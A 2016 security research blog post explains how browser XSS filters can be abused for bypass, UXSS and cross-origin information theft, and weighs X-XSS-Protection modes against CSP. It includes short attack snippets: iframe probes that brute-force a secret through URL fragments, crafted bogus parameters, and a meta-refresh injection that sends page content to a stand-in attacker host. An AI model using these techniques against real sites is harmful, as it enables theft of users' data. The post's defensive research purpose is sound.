Information theft attacks abusing browser's XSS filter

2016.04.07

Takeshi Terada, Professional Service Div.

Today's topic is attacks against browser's XSS filter.

The XSS filter is a security function built into browsers. It aims to reduce the actual exploitation risk when web applications are vulnerable to XSS.

The filter is regarded as a “best-effort second line of defense”. This means the filter is not expected to block 100% of attacks in the first place. The “first line” here is the conventional security measures on the web application side.

Looking back at the history, the filter was first implemented in Microsoft IE8 in 2008. Soon afterward, WebKit-based browsers such as Chrome and Safari shipped a similar function called XSSAuditor. So, all major browsers except Firefox natively have the function today.

Before the release of the IE8 filter, there was client-side software providing such a function: a Firefox add-on called NoScript.

Browsers' built-in filters have two key features that differentiate them from classic filters like NoScript.

1. They detect attacks based on request/response matching.

2. They neutralize detected attacks by modifying response partially.

These features are essential for reducing the risk of false positives. On the other hand, they have also been causing various vulnerabilities specific to the browsers' filters.

Before going into the details, let me roughly categorize the filter's vulnerabilities into three types.

1. Bypassing

2. UXSS (Universal XSS)

3. Information theft

The main subject of this post is the third item, information theft, but I'll briefly explain the other two before proceeding to the main discussion.

Attack1. Bypassing

XSS filters are expected to prevent the exploitation of XSS bugs in web applications, but holes in the filters have allowed repeated bypassing. Such holes can be divided into two types: “out of scope” issues, which the vendor decided not to deal with from the beginning, and the rest, which are simply bugs in the filters.

Since the first filter's release, many bypassing issues have been discovered, and most of them, except for the out-of-scope ones, have been addressed. I will just share some links to such issues here, as bypassing is not the main subject. (Note that only a small portion of such issues is listed here.)

Examples:

Alex Kouzemtchenko aka. kuza55 (IE, 2009)

Eduardo Vela Nava aka. sirdarckcat & David Lindsay aka. Thornmaker (IE, 2009)

cirrus at 0x0lab (Safari, 2010)

Masato Kinugawa (Chrome, 2012)

ElevenPaths (Chrome, 2013)

Gareth Heyes (IE, 2015)

Incidentally, it is a bit unclear whether or not bypassing is acknowledged as a “vulnerability”. Because the XSS filter is an auxiliary measure, bypassing has not been recognized as a vulnerability in many cases so far. Chrome (Google) seems to maintain this stance even today.

However, in the case of IE (Microsoft), some bypassing bugs seem to have been acknowledged as vulnerabilities. You can find them in the Microsoft Security Bulletins. Although the vendor tends to label all filter bugs, including non-bypassing ones, as “Bypass”, at least one bug, CVE-2014-6328, which I reported to the vendor, was really a pure bypassing bug recognized as a vulnerability.

Getting back to the subject, the XSS filter is not designed to deal with all types of XSS bugs, and bypassing bugs have been discovered even in in-scope areas.

Attack2. UXSS

XSS filter tries to prevent exploitation of XSS bugs by modifying a part of a response. “UXSS” is an attack that abuses this filter's behavior itself.

Fewer bugs of this type have been discovered than the bypassing bugs.

Examples:

Eduardo Vela Nava aka. sirdarckcat & David Lindsay aka. Thornmaker (IE, CVE-2009-4047)

NeeXEmil (Chrome, 2013-2014)

Masato Kinugawa (IE, CVE-2015-6144/CVE-2015-6176)

This type of attack uses a technique of supplying a bogus parameter to cause a false detection. The false detection makes the filter alter the part of the page where it detected the injection. Consequently, the page alteration breaks the document structure, which eventually leads to XSS under certain conditions.

The point here is that the attack succeeds even if the target application itself is immune from vulnerabilities. Issues of this type are basically regarded as the filter's vulnerabilities.

New filter's mode - block mode

The first well-known IE vulnerability (CVE-2009-4047, sirdarckcat & Thornmaker) highlighted the risks of the filter's page-alteration behavior. In response to the bug report, the vendor improved the alteration logic. Additionally, they introduced a new filter mode called “block mode” in 2010. WebKit followed soon afterwards.

The filter defaults to “normal mode” and switches to block mode only when the server supplies an explicit response header:

X-XSS-Protection: 1; mode=block

The new mode neutralizes the attack not by partially changing the response, but by replacing the whole response body with blank content. Obviously, the body is harmless if it's empty. The mode was introduced to prevent future potential issues similar to the first bug.
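The difference between the two modes can be sketched as a toy model. This is not the browsers' actual neutering logic; the `#` substitution below merely illustrates IE-style partial alteration in normal mode.

```python
# Toy model of the filter's two response-alteration strategies.
# Not the real browser logic: '#' substitution stands in for the
# partial neutering performed in normal mode.

def apply_filter(mode: str, body: str, detected: str) -> str:
    """Return the body as a filter might deliver it after checking for an attack."""
    if detected not in body:
        return body                          # nothing detected: body untouched
    if mode == "block":
        return ""                            # block mode: whole body blanked
    # normal mode: neuter only the detected part of the page
    return body.replace(detected, detected.replace("<", "#"), 1)

page = "<html><script>alert(1)</script><p>rest of page</p></html>"
blocked = apply_filter("block", page, "<script>alert(1)</script>")
neutered = apply_filter("normal", page, "<script>alert(1)</script>")
print(repr(blocked))               # '' -> the whole page disappears
print("rest of page" in neutered)  # True -> most of the page survives
```

The all-or-nothing nature of block mode is exactly what later turns into a cross-origin signal, as the information theft section below shows.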

The apparent instances of such “future potential issues” are the second (NeeXEmil) and third bugs (CVE-2015-6144/CVE-2015-6176, Masato Kinugawa), both of which can be reproduced only in normal mode (non-block mode).

Regarding the third bug, Microsoft's security update in Dec 2015 was incomplete, according to Kinugawa, because the vendor addressed only some of the methods he reported. The patch's incompleteness might just be carelessness on the vendor's part, but I think it implies that filter issues like this are complicated and not so easy to fix.

Back in 2009, I also mentioned an attack possibility of this sort in a personal blog post. The vendor hasn't addressed the issue to this day, though they have been aware of it. The likely reason is that this issue is quite a corner case and its priority was low. Yet I think there is another reason: they cannot completely fix it, given the current architecture of the filter's non-block mode.

So, it can be said that the filter's non-block mode has inherent UXSS risks and, while such risks can be diminished to some extent, they cannot be completely eliminated.

Attack3. Information theft

The third attack is “information theft”, which is the main subject of this post.

What this attack has in common with UXSS is that it doesn't need XSS bugs in web applications. The difference is that the consequence of the attack is not “(U)XSS” but “information theft”.

Firstly, as an example of this type, I will explain one of Chrome's bugs that I discovered in 2014.

Takeshi Terada (Chrome, CVE-2014-3197)

A bug example: CVE-2014-3197

Suppose a target server serves a page containing a script tag like the one below when a victim user visits the page (http://target/).

<SCRIPT>var secret='1234';</SCRIPT>

The attacker's objective is to steal the value of “secret” via XSS filter.

The attacker embeds several iframes on his attack page. Let's assume his page contains three iframes (F1, F2, and F3) here.

<IFRAME name="F1" src="http://target/#<SCRIPT>var secret='1232';"></IFRAME>
<IFRAME name="F2" src="http://target/#<SCRIPT>var secret='1233';"></IFRAME>
<IFRAME name="F3" src="http://target/#<SCRIPT>var secret='1234';"></IFRAME>

Then, the attacker tricks a victim into accessing this attack page.

In this case, the F1 and F2 frames don't trigger the filter while F3 does. This is because only F3's request URL (the fragment part, “#<SCRIPT>var secret='1234';”) corresponds with the JavaScript code in the response. Note that the filter activation in F3 is caused by the filter's false detection.
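The matching behind this can be sketched as a toy model. For illustration only, I assume a simple substring comparison between the URL fragment and the response body; the real Auditor's matching is considerably more involved.

```python
# Toy request/response matching: a frame is flagged when the script-looking
# payload in its URL fragment also appears verbatim in the response body.
RESPONSE = "<html><SCRIPT>var secret='1234';</SCRIPT></html>"

def filter_triggers(frame_src: str) -> bool:
    """True when the fragment of the frame URL re-appears in the response."""
    _, _, fragment = frame_src.partition("#")
    return bool(fragment) and fragment in RESPONSE

frames = {
    "F1": "http://target/#<SCRIPT>var secret='1232';",
    "F2": "http://target/#<SCRIPT>var secret='1233';",
    "F3": "http://target/#<SCRIPT>var secret='1234';",
}
fired = {name: filter_triggers(src) for name, src in frames.items()}
print(fired)  # only F3's fragment matches the page, so only F3 trips the filter
```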

The attacker can learn that the secret value is 1234 if he detects the filter's activation in F3. A question arises here: “How can he detect the filter's activation in a cross-origin frame?” The answer was found in the behavior of Chrome's block mode.

At the time, Chrome internally changed the detected page's URL to “data:,” (an isolated blank page) in block mode. This means, in the example above, the URLs of F1 and F2 are maintained, while that of F3, in which the filter got activated, changes to “data:,”.

The attacker can identify the iframe of “data:,” in a couple of ways. One apparent way is to change the src attribute of the iframes to “data:,#” and observe whether the onload event fires or not. In the example, the event fires in F1 and F2, while it doesn't in F3, because only the fragment part of F3's URL is touched by this src change. This way, he can determine that F3 is the answer.

Another way to detect the iframe of “data:,” is CSP (Content Security Policy) on the attacker's page. If he uses a CSP policy prohibiting iframes of the data scheme, the violation report tells him about the URL change in the iframe caused by the filter.

In either case, an exhaustive search of the secret value is needed, so the data the attacker exfiltrates must have low entropy. However, the process can be made somewhat efficient, because he can employ a binary search technique by supplying many bogus parameters at a time.
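The batched search can be sketched as follows. This is a simulation: `filter_fires` stands in for one page load whose bogus parameters cover a whole range of candidates, and the filter fires if any of them matches.

```python
# Simulated batched search: one "page load" carries bogus parameters for a
# whole range of candidates; the filter fires if ANY of them matches, so the
# attacker can halve the search space per load instead of probing one by one.
SECRET = 1234  # the value being exfiltrated (unknown to the attacker)

def filter_fires(candidates) -> bool:
    """Oracle for one page load: did any supplied bogus parameter match?"""
    return SECRET in candidates

def recover(lo: int, hi: int):
    loads = 0
    while lo < hi:
        mid = (lo + hi) // 2
        loads += 1
        if filter_fires(range(lo, mid + 1)):
            hi = mid          # secret is in the lower half
        else:
            lo = mid + 1      # secret is in the upper half
    return lo, loads

value, loads = recover(0, 9999)
print(value, loads)   # 1234 recovered in at most 14 loads instead of up to 10000
```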

This is the outline of the attack. You can find PoC and more details on the Chromium page.

By the way, the explanation above is a bit simplified. In reality, the attack succeeds only when all the conditions below are satisfied.

1. The web page sets the filter to block mode.

2. The secret occurs within the first 100 characters of the script block.

3. The secret occurs before the first comment or comma.

4. The entropy of the secret is small enough for exhaustive search.

5. The page allows being rendered in iframe.

The second and third conditions are necessary because Chrome's XSS filter ignores the part after 100 characters, or after the first comment or comma, while checking a script element.
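These two limits can be modeled roughly as below. This is a simplification of the described behavior (the exact tokenization is Chrome's internal business), but it shows why a secret placed after a comma is out of the filter's view.

```python
# Rough model of conditions 2 and 3: only the part of the script block
# before the 100th character and before the first comma or comment takes
# part in the request/response matching.
import re

def matchable_part(script_body: str) -> str:
    head = script_body[:100]                   # condition 2: first 100 chars
    return re.split(r",|//|/\*", head)[0]      # condition 3: stop at , or comment

probe = "var secret='1234'"
reachable   = "var secret='1234'; doStuff();"
unreachable = "var x = f(a, b); var secret='1234';"   # secret after a comma

print(probe in matchable_part(reachable))     # True  -> can be probed
print(probe in matchable_part(unreachable))   # False -> out of the filter's view
```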

The vendor's fix was to maintain the URL of the page, in order to prevent detection of the filter activation through the URL's difference. Apple fixed a quite similar bug in Safari last month in the same way.

Similar vulnerabilities in Chrome

After reporting the bug, I did some quick research on similar bugs found in the past.

As a result, I found several Chrome bug reports.

Examples:

Egor Homakov (Chrome, CVE-2013-2848)

NeeXEmil (Chrome, CVE-2013-6656/CVE-2013-6657)

The first one is a bug discovered by Homakov. The bug I found (CVE-2014-3197) was quite similar to his. The only difference is the method used to detect the filter activation, since “about:blank” rather than the “data:,” URL was used at the time he reported the bug.

The next ones, reported by NeeXEmil, are unique vulnerabilities. Unlike Homakov's, these attacks attempt to exfiltrate a POST parameter value instead of response content.

Another vulnerability worth mentioning is one discovered in Chrome in 2015.

Gareth Heyes (Chrome, CVE-2015-1285)

This attack works when the target page in block mode contains iframe(s). Although the basic mechanism of the bug is similar to that of Homakov's, the bug is unique in detecting filter activation via window.length (iframe_elem.contentWindow.length or window_obj.length), a cross-origin-readable value that represents the number of frames in the window. The value is 0 when the filter is activated, as the content is empty, and more than 0 otherwise.

His research also improved the effectiveness of the attack in a few areas. The improvements include a method to identify characters ignored in the filter's request/response matching, and a technique using padding to avoid exhaustive search in certain contexts.

IE's vulnerability

The bugs explained above are all Chrome's. There is little information on this type of bug in other browsers, but after much googling I found an IE bug.

Thomas Stehle (IE, CVE-2011-1992)

Here is the bug description cited from MITRE.

The XSS filter in Microsoft Internet Explorer 8 allows remote attackers to read content from a different (1) domain or (2) zone via a "trial and error" attack, aka "XSS filter Information Disclosure Vulnerability."

The highlighted phrases suggest that the bug is of the same type, but I couldn't find further details online. So I contacted Stehle, the reporter of the bug. In response, he kindly shared the concept of the attack and allowed me to describe it in my blog. I will share it here, as I think it's worth learning even today. Note that the following explanation is just my understanding of what the attack was like and may not be entirely accurate.

Ok, let's see how his attack works.

The target data is the same as the previous example (secret='1234').

Suppose we provide two bogus parameters individually.

bogus1=secret='1+

It triggers the filter, as the parameter matches the response.

The filter's regexp matching process causes a delay of several hundred milliseconds.

bogus2=secret='9+

It doesn't trigger the filter and causes no delay.

Thus, the attacker can detect whether the filter is activated or not by measuring the delay using iframe's onload event.
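The timing oracle can be simulated like this. The fake "filter" below sleeps when its matching work runs, standing in for the several-hundred-millisecond regexp cost, and the attacker classifies guesses by the measured load time; the page content and threshold are illustrative.

```python
# Simulation of the timing side channel: matching work costs extra time,
# and that extra time is observable from the attacker's side.
import time

PAGE = "<script>var secret='1234';</script>"

def load_time(bogus_param: str) -> float:
    """Return the simulated page load time for one probe."""
    start = time.perf_counter()
    prefix = bogus_param.rstrip("+")   # '+' models the trailing wildcard space
    if prefix in PAGE:
        time.sleep(0.05)               # stand-in for the filter's regexp delay
    return time.perf_counter() - start

# Character-by-character recovery of the first digit after secret='
digit = next(d for d in "0123456789" if load_time(f"secret='{d}+") > 0.025)
print("first digit of the secret:", digit)
```

Repeating the same loop for each position recovers the value digit by digit, which is exactly what made partial matching so valuable to the attacker.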

There are two key points in the attack. The first is the trailing space (+) in the parameter value. The filter interprets it as a sort of wildcard character, so it was possible to derive a small delay from the regexp matching performed by the filter. Interestingly, the filter's space handling also played a significant role in Kinugawa's UXSS attack (CVE-2015-6144/CVE-2015-6176).

The other point is that it was possible to activate the filter even when the match was partial. This enabled obtaining the data on a character-by-character basis. In addition, the attack worked both in block mode and normal mode. These apparently make the attack much more practical.

Considering the fact that the bug was fixed in 2011, Stehle was probably the pioneer in this type of information theft attack against XSS filters.

IE's countermeasure

Several years have passed since then. Now, let's see how IE defends itself against this attack today. In my view, the following are the keys to the defense:

1. Maintain the origin of the detected page.

2. Restrict the number of attack trials.

3. Apply more tuned criteria for detection.

The first is exactly the same as what the present version of Chrome does. The filter maintains the origin of the document when activated, even in block mode.

The most interesting part is the second one, the restriction on the number of attack trials. Specifically, IE's filter changes its behavior once it receives a certain number (10) of potential attack attempts. Once the limit is hit, the request/response matching is loosened. In this state, attacks are unlikely to succeed, because the filter gets activated even when the request doesn't strictly correspond with the response.
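A toy model of this trial limit is sketched below. The class, the limit handling, and the probe strings are all illustrative, not IE's actual implementation; the point is that past the limit the oracle stops carrying information about the secret.

```python
# Toy model of the trial limit: after a fixed number of suspected attempts,
# matching is loosened so that any script-looking probe "detects",
# and the attacker's oracle goes dark.

class ToyFilter:
    LIMIT = 10

    def __init__(self, page: str):
        self.page = page
        self.attempts = 0

    def fires(self, probe: str) -> bool:
        self.attempts += 1
        if self.attempts > self.LIMIT:
            return "<script" in probe.lower()   # loosened: fires regardless of page
        return probe in self.page               # strict request/response match

f = ToyFilter("<script>var secret='1234';</script>")
results = [f.fires(f"<script>var secret='12{i:02d}';") for i in range(20)]
print(results[:10])  # strict phase: all False (no probe matched the secret)
print(results[10:])  # loosened phase: every probe "fires", oracle is useless
```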

This solution may be regarded as merely “mitigative” in a strict sense, as there is still an attack window when the target data is small enough to enumerate within 10 attempts. However, this solution was probably the vendor's answer to Stehle's bug report.

The last is “tuned criteria”. IE's filter catches only strings that appear “offensive”. Therefore, merely having both the page and the request contain the same string, like “var secret='...'”, doesn't trigger the filter. At the same time, the filter is coarse enough that it is triggered simply when both the request and the response contain “<script>”. In any case, with IE's matching approach, it is more difficult to brute-force a string (at least) inside a script element, whether by accident or by design.

Further attack possibility

These information theft issues are recognized as browser's vulnerabilities and basically addressed as often as they were reported. However, the question I would like to raise here is: “Are the issues really fixed?” If I may go further, that would be: “Are the issues really theoretically fixable?”

Actually, Chrome's aforementioned CVE-2015-1285 bug (Gareth Heyes), which affects web pages containing iframes, was only partially fixed. This is because the attack relies on the browser specification that allows cross-origin reads of window.length, and it's not realistic to change the spec.

So, the core problem, which allows brute-forcing the script or something of the kind when a page in block mode has iframes, is still left unfixed. I think Chrome's security team concluded that the core problem was impossible to fix for now. Furthermore, this has never been an issue specific to Chrome. Under certain conditions, browsers other than Chrome are also susceptible to similar attacks even today.

Now, let's think about further attack possibility here.

Before proceeding, let me organize the process of information theft attack.

The two points in the attack are as follows:

1. Add a bogus parameter to trigger the filter's false detection.

- A secret value must be involved in the request/response matching process.

2. Detect the filter's activation.

- The detection must be performed cross-origin.

Let's look at the second item first.

Detecting cross-origin filter activation

How can the attacker know if the filter was activated or not in block mode?

If the target page contains frames, he can do that by window.length as Heyes showed.

But how can it be done in block mode when the page doesn't contain frames?

Firstly, the filter's response-alteration behavior in block mode obviously has a considerable effect on rendering time and traffic volume. These can serve as clues to the activation, at least if we assume an eavesdropper on the encrypted connection.

Secondly, suppose an image on the attacker's server is embedded in the lower part of the target page. This situation may be a bit too convenient for the attacker, but it is not improbable. In this case, an image request doesn't come to the attacker's server when the filter is activated, while it comes when the filter isn't activated. Thus, the absence of image fetch tells the filter activation in this condition.

So, how about attacks in non-block mode?

There is an attack example in non-block mode, IE's CVE-2011-1992 (Thomas Stehle), which uses processing time of the filter itself. However, if the attacker utilizes the response change as a clue, there would be little chance to detect the activation as non-block mode alters the response only partially. Thus, it can be said that non-block mode is safer than block mode in terms of information theft.

By the way, discussions of such side channel attacks are not new. Regarding the timing attack, in addition to Stehle's CVE-2011-1992, Homakov mentioned the attack possibility in his bug discussion of CVE-2013-2848. Also, in my bug discussion of CVE-2014-3197, I mentioned the possibility of attacks using images or something of the sort on the attacker's server.

Triggering false detection for attacker's convenience

The next item is a technique to cause false detection in a way convenient for attackers.

This probably needs a bit more explanation.

In IE's case, a string like 1234 in “<SCRIPT>var secret='1234'” is disregarded by the filter's request/response matching, as already mentioned. So is the value of “<input type="hidden" name="secret" value="1234">”. In addition, IE restricts the number of trials.

In the case of Chrome's script element handling, the part after 100 characters, or after the first comment or comma, is ignored in the matching process, as mentioned earlier. Additionally, an exhaustive search is required.

That means there are restrictions in the request/response matching that reduce the exploitability of the attack. The question here is how to get around or ease those restrictions.

Regarding the IE's matching process, last year's UXSS research (CVE-2015-6144/CVE-2015-6176, Masato Kinugawa) revealed that it is possible to stretch the matched range by space characters which work as a wildcard. We can apply his technique to information theft in some cases.

Suppose a server serves an HTML as below:

... <script type="text/javascript" src="/js/jquery.js"></script>
</head>
<body>
<input type="hidden" name="secret" value="1234">
<img src="/img/a.gif"> ...

An attacker gives two bogus parameters separately.

bogus1=<script+t+++++++++++++++++++123+++src= → It activates the filter.

bogus2=<script+t+++++++++++++++++++127+++src= → It doesn't.

In the case of bogus1, the matched range is stretched to “<script type= ... value="1234" ... <img src=”. This contains the hidden value, which is normally out of the filter's range. In this way, we can use space characters or something of the kind to stretch the matched part.
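A toy version of the wildcard stretching is sketched below. Treating each run of spaces (sent as `+`) as "match anything" is a simplification of the reported behavior, not IE's actual neutering regexps, but it reproduces the bogus1/bogus2 asymmetry.

```python
# Toy wildcard stretching: runs of '+' (spaces) in the bogus parameter may
# match an arbitrary stretch of the page, so the matched range can be made
# to span across the hidden field.
import re

PAGE = ('<script type="text/javascript" src="/js/jquery.js"></script></head>'
        '<body><input type="hidden" name="secret" value="1234">'
        '<img src="/img/a.gif">')

def stretched_match(bogus: str) -> bool:
    # each '+' run becomes a non-greedy "match anything" gap
    pattern = ".*?".join(re.escape(part) for part in bogus.split("+"))
    return re.search(pattern, PAGE) is not None

print(stretched_match("<script+t+123+src="))  # True: '1234' falls inside the range
print(stretched_match("<script+t+127+src="))  # False: '127' appears nowhere
```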

This technique may also be effective for detecting filter activation. With the bogus1 parameter, the filter removes the script element even in normal mode, and side-channel attacks can possibly detect the removal of the script.

Besides the technique above, let me just say further research is needed in that field.

Are the filter's issues fixable?

Let's get back to the original question: “Are the information theft issues really fixed?” or “Are the issues really theoretically fixable?”

The answer is that the information theft issues have not been completely solved so far. They can probably be mitigated by browser-side effort, yet theoretically there is no complete solution.

However, another question arises here: “Is it really an issue that must be completely solved?” In the attack methods presently known, an attack succeeds only when some relatively rare conditions are met. In addition, the impact of information theft is generally not as serious as that of (U)XSS.

Therefore, “accepting the risk” may be a realistic option. Chrome's CVE-2015-1285 (Gareth Heyes) was not fundamentally fixed, probably as the result of the vendor's risk acceptance. The same is true for UXSS bugs such as the aforementioned one from my personal blog post. However, whether the risk is acceptable or not depends entirely on the application.

Conclusion

I have discussed three types of attacks against XSS filters, focusing especially on information theft.

The attack types on which I personally place more importance are “UXSS” and “information theft”, which turn otherwise-secure websites into vulnerable ones. These issues are inherent to the filters and difficult to address, because they exploit the filters' key behavior.

Another problem is that it is difficult for website developers (and even security researchers) to know whether or not a given page is susceptible to UXSS or information theft attacks. This is because each browser's filter behaves differently and, in addition, its internal processing is complicated.

When thinking about these issues, what always comes to my mind is the filter's difficult position. I described XSS filters as an auxiliary countermeasure earlier in this post. This means the place where XSS prevention should be implemented is the web application; in other words, the browser is not a good place to do it. Generally, security measures implemented in the wrong place tend to be more complicated and incomplete, and are likely to cause side effects. UXSS and information theft are typical examples.

Despite the side-effect issues, XSS filters have been thwarting XSS exploitation to some degree, even though this post focuses on the negative aspects of the filter. Considering the good and evil of the filter, the phrase “double-edged sword” sounds like an appropriate description.

What's the best filter setting?

So, how should website owners deal with this double-edged function?

We have three filter setting options for now. What's the best choice out of the three?

1. Normal mode (non-block mode): X-XSS-Protection: 1 (default)

2. Block mode: X-XSS-Protection: 1; mode=block

3. Disabled: X-XSS-Protection: 0

As a safeguard against application's XSS bugs, options other than “disabled” are better. When you take UXSS into account, options other than “normal mode” are better. When you consider information theft, options other than “block mode” are better. Thus, we don't have a universally correct option, unfortunately.

Firstly, let's learn from others. On ordinary websites, normal mode seems to be by far the most common, with a small portion using block mode and very few disabling the filter.

Next, let's see what popular and presumably security-conscious websites chose:

(The top page and a few other pages of each site were investigated)

Alexa top 10 sites:

google.com: block
facebook.com: disabled
youtube.com: block
baidu.com: normal (no explicit instruction)
yahoo.com: normal (no explicit instruction)
amazon.com: normal (no explicit instruction)
wikipedia.org: normal (no explicit instruction)
qq.com: normal (no explicit instruction)
google.co.in: block
twitter.com: block

Other popular sites:

yahoo.co.jp: block
dropbox.com: block
microsoft.com: normal (no explicit instruction)
bing.com: normal (no explicit instruction)
login.live.com: disabled

When it comes to security-conscious websites, block mode seems to gain greater popularity, compared with ordinary sites. So, block mode would be the way to go if we simply follow them.

However, in my opinion, the ideal option is to disable the filter after implementing solid XSS countermeasures on the application's side. Disabling it frees us from uncertainty brought by the filter such as UXSS, information theft and false positives.

Actually, there are a few high-profile websites disabling the filter, namely Facebook and Microsoft (maybe only login.live.com). Facebook made the decision not to avoid simple false positives but to address security issues caused by the filter itself according to Homakov's blog post.

That being said, disabling the filter requires the web application itself to be (considerably) immune to XSS. So it might be too idealistic in a sense. If so, another question may arise: “What shall we do when we are not very sure about the application's security?”

Kinugawa recommends block mode in his slides. What he argued was that information theft, which doesn't lead to script execution, is less serious than filter's UXSS or application's XSS.

I also think that block mode is better when the application is likely to be vulnerable. The basis of this argument is exactly the same as his. In any case, I would like to emphasize once again that application-side effort to eliminate XSS bugs is essential, because the filter is incomplete, and even non-existent in some browsers.

CSP, another second line of defense

Then, how should application-side XSS countermeasures be implemented?

The key countermeasures are conventional secure programming practices and CSP (Content Security Policy), which I would like to briefly discuss here.

CSP is a specification standardized by the W3C in 2012. It allows developers to declare, in a response header, the permitted origins of resources such as JavaScript and CSS. Most major browsers support it today. The spec has been expanded, and CSP Level 3 is presently under development.
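As a small illustration, a policy is declared in a response header listing the origins scripts may be loaded from. The policy below is a generic example, not any particular site's, and cdn.example.com is a placeholder:

```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'
```

A page served with this header refuses to run inline scripts and scripts from unlisted origins, which is what makes reflected XSS payloads inert.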

The CSP's advantages and disadvantages are as follows:

Advantages:

- It is a very powerful anti-XSS solution if properly used.

- Using it on your site brings you no known side effects unlike XSS filter.

(Meanwhile, Homakov pointed out that CSP on an attacker's site could benefit him.)

Disadvantages:

- IE is slow in CSP's adoption.

- It requires much labor and time for secure implementation.

- It's not very compatible with performance optimizations using inlined JS and CSS.

- It doesn't block some of Content Injection attacks.

A big disadvantage, particularly in comparison with XSS filters, is the considerable labor and time necessary for a secure implementation. Dropbox's blog posts, which explain how they introduced CSP, suggest that they had to put a considerable amount of resources into its deployment.

Even with these disadvantages, websites that found much advantage in CSP have already started employing it. Twitter, Facebook and Dropbox are well-known examples (though some sites are using somewhat loose rules so far).

Attacks beyond XSS

Because CSP is more powerful than the XSS filter as an anti-XSS measure, it would be an option to enable CSP and discard the filter. Nevertheless, some websites such as Twitter and Dropbox use both CSP and the filter in block mode. This might be related not only to the first of the disadvantages above, but also to the last item, “Content Injection”.

Content Injection, in comparison with XSS, is a broader class of attack that contains both XSS and JavaScript-less attacks, ranging from simple web page defacement to more advanced information theft. Attacks requiring neither JavaScript nor CSS have been discussed by researchers such as Michal Zalewski, Gareth Heyes and filedescriptor.

Interestingly, the XSS filter does a better job against some of these attacks (obviously not all of them). Here is an example taken from Zalewski's and filedescriptor's articles.

<meta http-equiv=Refresh content='1;url=http://attacker/?

When an attacker injects this payload, the content between the reflection point and the first single quote in the subsequent part of the page is sent to the attacker's server via redirection. The XSS filter blocks this attack, but CSP doesn't, because it doesn't cover redirection.
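What gets leaked can be computed with a toy example. The page content below (the csrf_token value, the surrounding markup) is illustrative; the point is that everything up to the next single quote is swallowed into the refresh URL.

```python
# Toy computation of what the dangling meta-refresh exfiltrates: the page
# content between the injection point and the next single quote becomes
# part of the refresh URL sent to the attacker's server.

PAYLOAD = "<meta http-equiv=Refresh content='1;url=http://attacker/?"

page = ("<p>search results</p>" + PAYLOAD +          # reflected injection
        "<p>csrf_token=abc123</p><a href='/next'>next</a>")

start = page.index(PAYLOAD) + len(PAYLOAD)
leaked = page[start:].split("'", 1)[0]   # everything up to the closing quote
print("exfiltrated via redirect:", leaked)
```

No script executes anywhere in this attack, which is why a script-focused policy has nothing to block.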

This means, while CSP is far better than the filter as an anti-XSS measure, it's not necessarily true when it comes to Content Injection, the broader attack. This may be one of the reasons why some websites like to employ both features.

As a side note, CSP's specification clearly states:

CSP is not intended as a first line of defense against content injection vulnerabilities.

The first line of defense is the application program's security itself, after all.

Future prospects of XSS filters and related research

As shown above, new techniques in all three attack types (bypassing, UXSS and information theft) were discovered recently. This implies that the filter will continue to be an important research subject for the time being. I myself wish to take time to work on these, especially information theft.

From the browser vendors' perspective, the issues will need to be continually addressed through delicate tuning and tweaking of the filter. In addition to tweaking the existing modes, I think browser vendors could provide a new mode free from side effects.

One idea is to add a new opt-in mode that doesn't perform strict request/response matching. IE seemingly already has a similar internal mode, enabled after 10 or more attack attempts, as mentioned earlier. Such a mode would inevitably increase false detections, but it would relieve us of the information theft side effect.

P.S. The content of this post might be a bit old, because I had almost finished writing it by the end of this January and have been waiting for the Safari fix to be released. In the meantime, a nice blog article discussing the filter was posted by filedescriptor. You can check his post out here.